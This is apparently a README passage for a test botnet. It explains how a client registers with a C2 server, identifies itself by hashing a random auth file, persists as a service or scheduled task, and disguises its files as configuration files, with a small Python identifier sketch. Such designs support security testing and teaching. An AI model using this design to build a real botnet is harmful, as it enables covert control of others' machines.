The client will gather relevant system information and send it to the C2 server to register the new bot. Identification is done by initially creating a file containing random data -- referred to as the auth file throughout the code -- which will then be hashed each time the client runs to identify the client and authenticate with the C2 server. It will then install all the files in the folder specified in the code, and initialize the system service or schedule a task with the same privileges that the client was run with. The default settings have the client and other files masquerading as configuration files.
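The auth-file scheme boils down to hashing a one-time blob of random data on every run. A conceptual sketch in Python (the real client is C++; the path and hash algorithm here are assumptions):

import hashlib
import os

AUTH_FILE = os.path.expanduser("~/.sysconf")     # placeholder install path

def client_id() -> str:
    if not os.path.exists(AUTH_FILE):
        with open(AUTH_FILE, "wb") as f:
            f.write(os.urandom(64))              # one-time random data
    with open(AUTH_FILE, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()  # stable bot identifier

if __name__ == "__main__":
    print(client_id())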

Getting Started: C2 Server
Read documentation here

Getting Started: Bot Clients
Read documentation here

Other Notes
Because this is for testing purposes, the C2 server address needs to be hard-coded into the client and web delivery files. It is currently set to localhost in all of the files. This is because an actual botnet would use something like a domain generation algorithm (DGA) to sync a stream of changing domains on the client side with a stream of disposable domains being registered -- or just really bulletproof hosting like the original Mirai botnet.
The code is also not obfuscated nor is there any effort put toward preventing reverse engineering; this would defeat the purpose of being a botnet for testing and demonstrations.
The killswitch folder contains scripts for easy client removal when testing on your devices.

This tool is for testing/demonstration purposes only. This is not meant to be implemented in any real world applications except for testing on authorized machines.

